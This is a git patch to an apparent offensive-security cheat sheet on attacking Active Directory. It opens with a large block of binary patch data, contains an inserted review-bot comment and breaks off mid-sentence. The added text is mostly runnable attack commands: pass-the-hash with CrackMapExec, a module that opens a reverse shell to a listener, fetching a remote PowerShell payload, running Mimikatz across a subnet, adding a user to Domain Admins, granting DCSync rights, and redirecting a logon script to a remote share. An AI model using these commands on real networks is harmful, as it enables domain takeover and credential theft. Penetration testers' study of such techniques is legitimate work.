z<2}sZ1))i7<`B`KI#7TQ2^Z4p|FH(O;`$t=6#gjB_yb(be&rp0(xdhG85vF!b^8zq zJ&UJ6texE?E$%3WTz@8)WZN03>+i^W=YQYbG&IOz#tT1D49!5D1?S0B&{&|8$rdDT z7C`S7FMy=ALl|VGgwUN?(rli{M&-rb?jO*C{$7~z_Lidn4|^SNH~IuHm5zZm_Az%r^Rx4n*4AJo|E@3iC9k&u9<_;sKs$VveA^dX$ImC2zz_*9 z$q|B_IiuWpFdWQ+bTML!Gw6bDKh5qmgRWLolUfqe0t&l@&gBJ@Ennn| zp)teL5!P`C31l7pXn8!S!<$FK14PW*B4acBWg>njRl_L%%!iLGCDgCA-M<^S^8qUq z5rgZ$LT;hZUN`K`-55}^T)KMKug7GC@y^oR0x`4&Qrly}vdgl{s|o7@;A_fi&ZDUY zm4p$|u!*Yp(|1>CU*9BFnW_IWr|o8B#Du+X{~G&uct^*Zg$;fd7pFSp_{rQA^g(3e zS83bT@%@r#)rH%HU`4LF@_09aZKRWS*DnvlbGI2wE_O?==b24sj5T5|xr&cy49s1? z?|9nySUP+$zJGey99E|OJ^@8;I&1%g{4OL-g5)jL5b6bj_atxu$yRNAq*?^0_xHF(JIcAkXHvqbsKgPqcEkR05wzr|U_iV(~O86e{~Yf)!qf%1-SLMSQ!f z$vN8I6BF}DALLwFU3OfmBwHx`p8%{x7Ir>x%;gRc1H#ru9}*8%V0k$~cPlH(+qgzV zfY1K;-9Y1pa4wFVZ(&pNoTKWA4q_tS(3AeRhUO4%oCsA@Euzab1%e>pKwKP0vyP`= z6&{TeM=(ylScia&?-Pe3uj$>v#YwTeiGEe`tyXt8JFy}jq&60{f&opQaOEW_r$8jz zaw%dcwCmQ_3VJ>a+TFBcS}@bm*RNpx>r6(w+@CV4>{CLFuA;w z6{>(^WVOEN8kRsPdOjJ~k0Np($gE#EsGi|#68Hl>GEmhLx_(8K@XqxR+T;eOYki@x zIe5Q0!S)W&$5n-6jz2^X4uOkk- zzrufN^DBvxo-?)u(N-;|`f^EQKfDFKtRL)N)(h+H;TtF$1>#gs`fnIi`M=c%{y~q| z@OAon|L{-eA){bg>QinulY&B?NSvlEchG+@{H{-_o}Nx)PP-^5iP%BcVfQq&J#LfZ zlh_jk_C*1prrWpipb9&RyHK#tzWjoXXtVxn^! 
z(^Uh6Mq8&}Wl!j8kYGr`9=c&tX(RNTBsu&Pt=^laM|u5jzWdj@)GPcQU?KISxJIQ9 zNg;T0aJZIJ0Q3?XzZZO!$@1($hVoSCvPM6XjQ_&3m+%il~)@8)#P-<*^5QiWX zN95pEy7BVtpcE*!e_a4Q>YI%H;pn2nL?n-}!E)E&CPxIe_ zU2T{!FHWojGNK(oNJqKec=8?>0FF!4;@!|GAR`4BPsnG#e(4E`7-Klvk$?rg9o36H zXAtra{VEF=m|8&&Ho|{ZCt2$YVtUvRlO7D6Otr>O7oJzZc1NCHlddn_izZt&$%#xD zn++Vo$S0n01H-^>!Qyb#8?WacO^iL>>C%4A$%XLtP zbLs8LIp`Xa7QF*a^uhOA%c{nuSmgLH;Q>hkw;HDRZD7xXOf&Yn`o5>JwX}+NWTjWH z2<-OJ{{3?L&N;~Nso3HZUPJ8=>B`{uMu_Vv&>lqsV^sz;-2IP300Vpo`eGY3^$@JS zKeHda69E+M?>ja`o3HxqRi!%b!!VhrcrzX8Y$OEkhxG^e1GkctGNNrfMT}orw>hsL z5Q&S-v+CE9+0pPc!ubs~V~D)Q51x&oizJ&z^SB@J7!cu8(Ot3ugR9Vipxc26{etbR z^6CgdBDk-v&u81!V!Ow^!^INOrA1ZMTb3Qajo5Lb#fkP!sMJfhHMT+V@9Xh(n0`y^ zdZx8544SjB;^S6`%svNGBG3AcQGX}!{fGyd_Updd)2Tj|{8L2vRV+f&0W9#NanRNE z6|pf$xYq{DZDb-|aX79Gb~+OV-s$nN)EVT8iQB>dYhx^J?V_i;&cj|Zzq_mC?uf+T z!a~&Y$NIKu|78LC?b)S;PdB=8QrAez?4!Jbhd45NvRP+P!^?)v-IFDHj1#pmi?p|N z(K)c8aK&t^=WSy)=yATpZ9rso2d|F#FdCkM4oeBHvM*48Dc~x&+WcLIo>XN2T180t zhgws5abr3PoxZbhWBMIj!Gx4Y!c@og2hPZ4NsAFz*#i={WK3f9N;(QV@`gaHf#0I7 zLJF-_cu>$!3!7E?Qf4S01L>aq|7MT`L4J@vD~`>yR!1uuRx0fVQuL2qG^>)Axf8Oz zy_KLup*2MAoM0NXwEhGMQ%H{V@EVM%URq<7ATe4HFD6xi@|+7C9m?}rYv zj8mJ_w`*O(SbV5yQ3vFX)jc$iFKZf#Bh=vq61#eZp9h9r%q!};Q1y#vP4-VDF8BwL zGu+HA9qkXUfs@z=bYZKVZss4zdd1ju0z0v;hwSz6&6PW`1uiEctMuUXLxj1f?t-^M z^6Dy{Pg)#tb{Tpp5bUpe92Kz{E5M!{r}kEESstNQ%ko{u?SkZKjz4>Mx#)=wH5jP! 
z9~B8`PSOvo{SFFXCMUSo#t>-W zT*X-%|GlIjoF~pZwg?-4L0@$aeBCQ-Hp8;24n5Zp2Ujp54@lOUZMJ?gLljh-XM{Ioxm^i#P$`C58Dk3+J$dcyrl9TnlU zR{f?c39Z>mRWm5i`@Of_%gFfpOV)bxoG5n;!J$N8>fWS8UYeb%l1$0@NxPLfNhbe% zNmSN2YTweRS__J}YTVBd!x{Rr17dNlZVlo^NWCMrAX}VN>(cL3vBxap5A{js9zKs- zE4x8m-m~qOOEaH;aC)rHpIDpVo4aP9bIku?OW&yT&|Z~p@bBmbFSgG(uN!D1rHaLW z+H#dNQ{pjEV}TQ&*hA)bmUDC(9Zk8}muSJAzV9*hd5Qh2(yNx;X+brpqfSQ|-BMwx z&&Xr%4i?$ybdGc_$OW64FhR@b;9`7;0LX{X%DC}d|o z@Ii)b1sL^hJ|S035j8T|ruC(B`k0V^b2PePkHzbuv%hE5HJWo!OTAp}t|ZE6*O0@8 z!*#=m6m%s9J0Q{DOb)jyzede%XiBW3kdCbEXUa zH|SFeF`9?!kk0q+hDG48=qTG#IlORDKj(BWf_MAf0y^keH8xk#jsN2IT+Gi&NB2&H>*C;f_?o$OkptIZ?`mks!f8kuIRZ*S(~ zVc)}gBk*a8=cN8aS%~*eEr}RsND?VdcmFqCpyHh^9NNpW#C%~J`-kt@yZd>;O3 z{b@TM{Pg^!4FzF!&uJ0yOIG}J{ZCYbj``@1Db@-e=<=`tT1^@`P&G*fT!twum|+N7 zv!nCsu_s};QKHWGC=R-Ck-VSj>wnCP9qCxRS@e5BPBi3QtC9PL#Mbn-p2_5?Pm%)$ z(-kN(S0nn`hgB{?MEXzt?pb{}Jx&_m>1rmnwA{+qQ;gBkauF^HwzA*$yGe#Hmja38 zS=uDnOraVWTDBt3sV7V=geXxX^SfePz}^*?a0Q+kGnTTk<%=ZrI&JtVVrH*AUhk)_ zRsI?h!bmD@!4nf|!koalgzY=9an-O)I_%5k#~QfB&iMUVC(vviC;R$&p`tu{K<)UevlQUWI?L8O?32F-%N^H4Q_?Jn{th|H%LGyd|5G=5-EbBy^a zpH_k35Kq?)>~VE6S^SOIK@@HyWLrNW?XR**-Nr-d!@=%ax&Gp=-~XKJt$r>_S zo&++3hZmt|!-gCSsF65s%E{=|3bgFC8ZH{pQ_uiKUvnQXkpeO50_qA9IdbCC?>cXG z;UXl2B1A&-By_kN1^exg_`sJ!B=cY)5_s}CD{g(Os$wQ{1w6Y`hXEFzLg5mYi9u&~ zBD_O!T6fNmA?Fzj5y|4cvesHu;WM!oD_}dFuNg%G-wuP;Vu8J5?fiNg0|}`>9k`q!|lBwm#y~9fke8ap2hd+gaBSc^)8NF}EdYt;2+?eK9@8 zCC(X~m`1Rg7xnohSKLsGG`>d%G)gIg;){Tsm$`SlrDQ1@n2k=hhOnz9}SJ=Up zb>zF#2ZP^F!`fE_rnNs+E_?Fn+zAqdUeVj5$(*cKG-thE`C!T&|9EMyW;g$(8EnuP zGi}0?qtqkCzcLYKf$GbT1)D6m0Q%6wQexu={#&7vJwOdlKYv3JKO}kD3%aWyd?$SG zuNsv|!T#@Yiit&#P>DqxfTW<9bHYEQ4SkUriF>f*BN{c^TF=WO>|!P={&rgDW1?bg zUJrB3rt6xm&?rjOc-=G&K7@gzF5XZ2``&?&6n7f3&l5kXZq&V}7}JwZAGNdIyaT)L zPYT)#(l#VfdN1{|Gk$_7QRQur5#a8>ktFH!%_A?c$n4sqypO)WF515jFWXQ5nJ~ps zs6vmw(Wy?kWLEys`1y(=p8^(3@)or7!9t_vYHi9PU>uUEJ2k{XLVOTkGyQ%F^Z~cp zlB5OtSs!%ULW5r3UoM+(O=P}jHUavOyK04>y0}z>;ke#-y^=ElwBik(FB#qOhv*ukdT87K3xOHDPUb|J^Q5)o zYLFs{c5{Ekpp90|o5Jng?7m;jyMi7Va5h 
z;?zV$cfw`}1NY}o)p-R~5x=|5L#s;H2n)f?x8DuTAV&(B{H@+}Diwjwlboz% z9cfFtDd^e67U1{phc8BE=Whyu$H|>%t967@D2|w)OGRK`n4VvK<;Cr~{W;k0huSV@ z%k8_tveRC#z4zKxh@NU(X@$5)k)(%eP%L%Pt>~ia_V-ui zSfV}Yl~}wt%M|<`0}tT9;Bc64Rjp?UT3Se?xD@R1z{gw|YGO^!I*c3oeT4dM9VjB1 z)@8dDyyA5;UN(Jm!oQebx4I)B{lTI!iC7xZBT_8vMT-chCTXrry|}uPE#d{Za~yOL zKkwp>GxSS-TZ=Jqu^i!`Er?^x6e`#IzCtWHO z8xY0L{$&Vt8kpFiq0z^Y{$x1UtL!pHZrYNhuC<@S-%C6r5Jh?{^BZfGt zp4qDx`w|-wl5(h-&gKNCzXwWQr-SlwFzKO0jASaDm)XT-vi@QwH8(agMMf@|JtW(;H9ICU)3ov}C1(4!utE&(HmPO}P zaZ2mb9}Y!Dt+wY}WUL^IVKX2Tp7z>hbJYY^E6d3#`qC+1wjkVQV1q%-r48 z-c$sG0As(6f*gwusRhPENh=}uAG<&*I|lUhj7v(4COXwSRMbAL;s%K1c#^<2(3(9Sjtyt{Qouasa}EO3r^eTv9P*7g)2Kifzt-k#3g-UDwzxY4 z@RcLUaDq!_HogmMIS&c~`nx-Fd(~lLo~=*6Au$u!lMeDLD9&pf?Kto(R&D#AI)z!p z%W>6I2>T}6GZrvlgk|ZjwzlA;ipe&!y@%D1)nyNt51Jk^Oir~j*M3O6<7;p;5()xQ zT$77rI}_23a^2Mox=V&5p|>6Pv3o9LmoV{VMEHRpSC(7v^)GmZf54aEgvtlAThfq< zcJK~$9m%{7PkWXN{5nS?GcL!xuq}d^-Ak)WYK{Iav%u(4uoCa&rf^6-OLQ{uxPZS? z&(E6)td`a3AS+yYxDeh9f~+)v@=pVwe;? zh_I;a_O}%iP0idcq#@=M))lC>TBGYEKY{D zQGmYJ(~b!xdh=4;17D2ky!f^9($G2@5^ggouIM60dPHBJjnHzbyATRrB_nZaYy`by zobsoOpT`f*!S(B{k3&;Gh&?m5@cd13<%e(;rx1oEu56)$^*{}KS{af88uLP?} z6~<#6*rwYKb7`VnS&53}96=)ceAq#50lf?1g{s6RItd^){y|;7?(?m(0pl&%e2e6) zeM>6HS&?w?Fm64KLY?q^_d&kdw6MLY%#_bPJd0v7&Z9-I;dw4yH z;3a>Xhc&>`jatAm+i*H*~{ae2X;vFuff8 zR_LMG_OnrpeJWhiqxxM0C>M2<={ZjVRYDmrs*GbyySH;d1(+ZBizqtoho)8Qf=Dg# z+Zo##yXU6{x2oz;3r4}80~m6RutTSpTawL;6|0e@!;P%tWl9#BQ>Bo3{5*`PO;e%D z_V?{xQ|*&A^~{jEmh^R>T$ECs&p{vc*EFQT>|c+IVhrUY7)g}E!lIg6)gE{3F9tMj zsJ1^In|@6N5@uVgK zJHfKf*9N3%X3-O}$JYjUvV>WnPZKgw3N^QZI09r(QPOAQ?QE4H8BMsXHN-R{#Gr+5 zKa?cm;M8v=QCl#M28V7Bc7woMR*d7Jmj-hn_2lZVj@lL~q3pf3PR<`U&->H2bP;3U z#EXB#2U073Hp$vr0!J(=f&oN1LT%dym0Kt+19>P>zyRw8!;>LHnBTpI~$87t&m9)35IL@jOYG`5^d8<8XIzX=|E0+$R{=V41Kfi#s zd3dxC<$aFf3BIWxqw;=SE<5z<$IO^rzP_Z?Ne)9DS!<^qk170=`YJ2znS}SH^3U%s zMXwp-H|Id83&G0kam|zv(``6XU}HvG;3<7gHPf$L(adp;506)~;K1vv)nD4(X(~b_ ztYu;RhZYDaTIXA;5dUUdx|kqv;pB=1N%TOH(&_F2`q_iR3@|Rm- 
zth*gD>g?o%b;^?*V82UkL9cw8EVj|=LPbCeH(vQj7l-^f3!>``mA4<#BfE9XBajt* z!D05M^0tT>1}kV--2(%-Wo<*o6uiR943tI3lK3#9+jPY@Zuc;YCNR}+eTzL#meq3!= z|0N+yNs{VyH?R2rxZZOT#vxWk6jSh(3l`5FCQ4F|Op#pggr34k2v>g@)RwFU;M~Qz zL{esvdX(Ts#!PqZI(z*J^1q*F`A(aBv)5|k#6I%<5pR(!DJu2r3=wV^k)b>-_DLgY z0*by-php>o<5py=BuVLI@7tN~$Nfr2&?U0(58I24-9WL;N4nH?b&`(CWCxQGMjEbxVbtscF7DoT!-8bJ%)S(OQB5Xa?iT$Mw)cLZn)S5T zPF|E}#k%YI0z0}gA&|I^D~HijkEHYK3k5b-(0g9{ufHMbj98gwzeSJ;YF7n)|77a0 zH`m4Q?+;u)IXRtCp2c$?CMne{2QWS;GsMs(Nn1phXigMPmSqR}^uHZ$Y_xhJ-kWA@ zFqy3LkuVJftNQBJIB+!eck^bsi3K?w6r1a!*(*Zfd_U3CS&_!b5-^fLW#G`WHfP6dLujWg; zn+v#^=9enu2|V5-Ic$p>&k*8>N`B`qmgu(QcY*5*NE)tcKNA1U+t)9ttGGX<`&bqZ z&m(+t#b4mr-bl>D`KN3`$Ei{YpI2p~+HNGu8yIx5@Uq$_IbT{nRf5{?pb~VI5Y()K zTNEHQEZ%O{!Tq~nH&z#wp|xx9JfbpGMR=R=bdeG;HT8M+zT7K-tFC?Z7}$k-LbYW0 z{uXrn>50}r8$Qg9XKrxiX~kL0_jxR8W{u<|oAeTi!#`a!tn{DtI!2 zU@Z=b53u1MW430rk(CQ7FU^(&$9rjw(sHY_nD5&auIZ9Z6OQ=ZK`IOWN=O>2oq++`54#xFIPrIdxT?inkM66W%Xn|>6WX{hhysOX$SxmnlRUNjvUe#U z%FED0H%Cn~n~6W2abX2IYnn`II~#fj+ws%S{N4*j#OkoPl3G;B*f~iC?Qzyt%lyjj zf3+NEB!um&p_xhqOQT$qtdkOBR)&>qYb`M)LGD2oa;ST;nbfyv3wfnm9NC(_Yxw=( zj=o0DPJheh2`HC)x7x@Lh7Gj~$bHvq^@m5d!_1E=arpSoZKW+s^CZ*-W*1XIfiJ4=%W%{&=@s2_T48dRN}FM~mnys6T}I^e zSe=S}lA2N%7|l9~n#Dk;^-G5YCowedit}!vzQ-@&Ol4;2b#BOL5=BkO5qX>2|8l1# z-rfs^9rg(67-Ms$ae~}edYb-EKJWM8~dQdLp2KHdYT+LXjD^{iO`UMXm7W=D>0(9NU z+m^e}x3P+IrZ&+4JHID~-3V&`oqG>D( zhZ@8=HaCgEvLs9C609dIyu4EH zyC--2Mh%bnuJa|A;i4q-{_s0CvLR0>+yMjL620Kb!#DN7{RWhePDQ^IuMU5clmxjr z2K<2zp4O(j?G;IWC{sO7lR(?pSnmwDn7?vrzC%D1LK)Z(&%u~E>5K@#KMTYwi9Owv zFstom3-a-MW8W2R$6p{NX_Y@>bOmgvQy7UeFAw`Tvd&t)zT^*mmBzQrvOvX{*F>D9 zs{CcONPL{)z3cDyHIc^68BLYwcRp0dPCZzsx0w@m)ccyz=gTJgiz5wra$)J?7P9BG z?pdI#^&9Bu9;oAOo>QwgAv0h)49NWO(Q(Ow_2#YNwY|Wjvu#4ux4TA z<_ad-;n(()%CI1$GgvCqVeEQ!gNa;_pEbvKIMPM|v2w{2F~FGyw|7+{8B8v=Pv^tNA?lQR2K;czQm1zP7uA z>>adtuC{~f>X3=eRa6~6`yJ&SZK2nh4TOIoRewWiGL#7(>V!hTu;=Oct|wBWw349= zTQiq1U(AcHV4+n)K39&%*(WpgQOlY8FCp8r!+i6#8}{Q|LHDf+UzMg~hW_A`TAq>j zWPfkV-$XyTat5MDCHz(T<6kA2QSKsq9giN|qIJ@AS}cLbi$ 
z`TsfG0SEFaVYP*vUZcuVZe5l2T)@F{>k&r!|}juE=1%d@=r>-+{mM}WkBxk4fys*?3($DJKV=eA{xuwYs= zM`Z*ZM#2#@x-?Z@Z0yOSq@A7?qkYald-xyqNzi^y34zQA64?bZJ2RcrKhWlr?B7Nx zWWdf#K)<87h+@YJ>^Dc5<-jz20OOe)6rV^D&GBj{A?WSJiL6iyB?BAC!D#J)tfnl$j2fRNVK__&`+IL&6Qg2PBg)?s>H+*9c!-BA zJ*4N_!@p_ZY}C#3Ikh`sKEtyW(Z=iuo#=1a-FEq z-@~sTv)}P7|4U`>5R{_lafR+FboRFnr01`g7E+>dKasIbOTULIkqNSAWK*vvXk~lb z@4mc&D;0mcpMDMd|S*rk~yyJH;C@st*6&NoM?`G0iPp&LflVG10k89V69A;ua zG*|T+6*ZJaB0GquKd{Byo9}HVFg_WOG&O?KY-g?7?=IGrmLNROD(y+t)kxImmU;8YOs^`r z*z_R;!LA_yx*OmzS5%z^^+o1pKXNEP2@{fS3U=4qj6Bx<3|p@sU7nGXGfuRYK0I*p z!>L^3v>E}#N~(T@BX_7ZE{d5iWVcHRuzetw80$&nIXHC&wZ6krhE`=v%?5(YNt>~~ zh8kl``PmstYAFjw4D7RO9gKU*WfdOs10OdM2n?-7H6Blb-cO_K@on?WQ_TsZh9?@$ zpy$t+BJR-hD+K&=d;{*IT6sH^)ndV#MVQD$|BIr#2`_G!Y26aB(A*84u+=Y2@i zFmx5OhHWJ}CDZpBB;VY?e3xzygSgwOnOEaOp8qbB2z$iKAizo~1q+r;RUNLd0wn#!aQzsxXYW#*Zp zJBG7nS3*ugey9JQlD48N1%fyi&Rg5 zmMZ&%gm?YUURWMO5eaf{w@n#O*LXyg3Ev~j($gINe3;N2M&Ufo&X3^3>dEDfd5$4_ zeg0!hI0AhxBkB!D(ng;rQ5Zy~n46QOrRsF|1vopu$$qW)`x;55qKaD)bmjuSQph=3 zVbWl<6f8mqXu$nkBkGxFX$(xt-b}2Rd|C!CV&}Te;fDjLDx1$ryqyiuG_ToYD#1X# zyTj^UUK`Rj=XghvobRU=%j&EQ;TprXS@E@2-?Z|bY}_92d`Y!tOPzyO6Qng&#t)$q zot^D`9i1mAMDWq)sE3vh3cGOi0^0>LY}w?OS4%JP==Slm@Ms+duH@pXaGAAyzN*>P zFq;By9vwF&JsvA@<(QAk8jQ_hBo}?$7)q3fsSJdjsjq~+yKqg5pp*HiD5}`Bio;0( zPC)8lD5y0yU4Qre4eXRlqGtyD^|acJo1>0y>x4lg={T1N1KJ~qSD|-kR1w0CSnZmuWR9W0~W}n*5 zlMokPpBoS+M2SBxv(V8=jcR>3chU@LHN9Gdx)m02C;eVfbmR6WChE2C?)7udt7os% z*ZeWk_Pavt=gy{jEV2u-?3&7LimW5a3fBd!FXrwfJHwau3`X05>ciMPUV4rd=wj>P zE2_OCe=gYO@JkW{xqX4op4|4}_~46-?aKmq@cS}^TDUuW93;HT=XEZrV&<|oIC|VI z?v8bx@MxnB5HPorW?6kz89d@qFuX{Cvd-*wc72*~c)6U(K$~pJ#M9HHAPaY`@(UyT zxP$#@BxCT)tm9nqICEO)QKUTF4s; z@3cSN&^sF$#d00o?E?2>Jw@rVMh8GG{#+!!4%u8JHdvIpm~QKd=DN8~T?IV`kEX$t ziWQ4Xt>t$^tLzS%9IeTubVLtIE5_&-?d+Q2=*}_|@ooI~`sRmohbZ#&*G(h#h5a34{Q0uNbB%z& zu8!?YJ;8KO5buX#ZnPEV-*oFv*S0f7vH0o?WC=~}yRxQxB<#nX`A}cuE?d`!(-NBJw9EG3V^HES1}v;d(^1C4U*4Yw=7et{r{J zpSmArEdPLXJl=;woVp>veM z2K0y^v%mKwhKY~cyn=%GlzKfO-aTHjC_4F7Q&z$`J#My$Du3K!h6^PbxMOOUc`eTe 
Date: Sun, 3 May 2020 16:28:17 +0200 Subject: [PATCH 45/85] XSS Google Scholar Payload + Skeleton Key Persistence --- .../Active Directory Attack.md | 125 ++++++++++++------ .../Windows - Persistence.md | 10 ++ .../Windows - Privilege Escalation.md | 50 ++++++- .../Windows - Using credentials.md | 18 +++ XSS Injection/Files/mouseover-xss-ecs.jpeg | Bin 0 -> 1148 bytes XSS Injection/Files/onclick-xss-ecs.jpeg | Bin 0 -> 1123 bytes 6 files changed, 165 insertions(+), 38 deletions(-) create mode 100644 XSS 
Injection/Files/mouseover-xss-ecs.jpeg create mode 100644 XSS Injection/Files/onclick-xss-ecs.jpeg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index ce4d6d8..489fcd1 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -46,6 +46,9 @@ - [Ghost Potato - CVE-2019-1384](#ghost-potato---cve-2019-1384) - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces) + - [GenericAll](#genericall) + - [GenericWrite](#genericwrite) + - [WriteDACL](#writedacl) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Kerberos Unconstrained Delegation](#kerberos-unconstrained-delegation) 
@@ -71,38 +74,50 @@ * [BloodHound](https://github.com/BloodHoundAD/BloodHound) ```powershell - apt install bloodhound #kali - neo4j console + # start BloodHound and the database + root@payload$ apt install bloodhound #kali + root@payload$ neo4j console + root@payload$ ./bloodhound Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j - ./bloodhound - SharpHound.exe (from resources/Ingestor) - SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 - SharpHound.exe -c all -d active.htb -SearchForest - SharpHound.exe --EncryptZip --ZipFilename export.zip - or + + # run the ingestor on the machine using SharpHound.exe + # https://github.com/BloodHoundAD/SharpHound3 + .\SharpHound.exe (from resources/Ingestor) + .\SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 + .\SharpHound.exe -c all -d active.htb -SearchForest + .\SharpHound.exe --EncryptZip --ZipFilename export.zip + .\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder + + # or run the ingestor on the machine using Powershell + # https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public - or + Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory + + # or remotely via BloodHound Python + # https://github.com/fox-it/BloodHound.py bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all ``` * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - ```bash - apt-get install -y libssl-dev libffi-dev python-dev build-essential - git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec - crackmapexec smb -L - 
crackmapexec smb -M name_module -o VAR=DATA - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - crackmapexec 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - crackmapexec 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - crackmapexec 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - crackmapexec mimikatz --server http --server-port 80 + ```powershell + # use the latest release, CME is now a binary packaged will all its dependencies + root@payload$ wget https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip + + # execute cme (smb, winrm, mssql, ...) 
+ root@payload$ cme smb -L + root@payload$ cme smb -M name_module -o VAR=DATA + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares + root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable + root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" + root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' + root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz + root@payload$ cme mimikatz --server http --server-port 80 ``` * [Mitm6](https://github.com/fox-it/mitm6.git) 
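Review bot: the BloodHound ingestor lines `.\SharpHound.exe --CollectionMethod All --LDAPUser --LDAPPass --JSONFolder` and `Invoke-BloodHound -CollectionMethod All -LDAPUser -LDAPPass -OutputDirectory` carry switches with no values, so they are not runnable as shown; give each switch a visible placeholder (for example `-LDAPUser <user> -LDAPPass <password> -OutputDirectory <dir>`). In the same block the bare `Go to http://127.0.0.1:7474 ...` line sits inside the fence without a `#` and will be read as a command. In the CrackMapExec block the fence changes from `bash` to `powershell` although every line is typed at a `root@payload$` Linux prompt, "packaged will all its dependencies" should read "with all its dependencies", and hard-coding the `v5.0.1dev` release URL will go stale quickly; point at the releases page instead.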
@@ -1026,24 +1041,59 @@ Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccount ### Abusing Active Directory ACLs/ACEs -* **GenericAll on User** : We can reset user's password without knowing the current password -* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` -* **WriteProperty on Group** : We can again add ourselves to the Domain Admins group and escalate privileges: `net user spotless /domain; Add-NetGroupUser -UserName spotless -GroupName "domain admins" -Domain "offense.local"; net user spotless /domain` -* **Self (Self-Membership) on Group** : Another privilege that enables the attacker adding themselves to a group -* **ForceChangePassword** : we can reset the user's password without knowing their current password: `$c = Get-Credential;Set-DomainUserPassword -Identity changeme -AccountPassword $c.Password -Verbose` -* **GenericWrite on User** : WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` -* **WriteDACL** : It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'testuser' -Domain 'xenoflux.local' -Password 'Welcome01!'` - ```powershell - # give DCSync right to titi - Add-ObjectACL -TargetDistinguishedName "dc=dev,dc=testlab,dc=local" -PrincipalSamAccountName titi -Rights DCSync - ``` - Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). ```powershell ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show ``` +#### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain` + +GenericAll/GenericWrite we can set a SPN on a target account, request a TGS, then grab its hash and kerberoast it. 
+ +```powershell +# using PowerView +# Check for interesting permissions on accounts: +Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + +# Check if current user has already an SPN setted: +Get-DomainUser -Identity | select serviceprincipalname + +# Force set the SPN on the account: +Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} +``` + +#### GenericWrite + +* Reset another user's password + + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + +* WriteProperty on an ObjectType, which in this 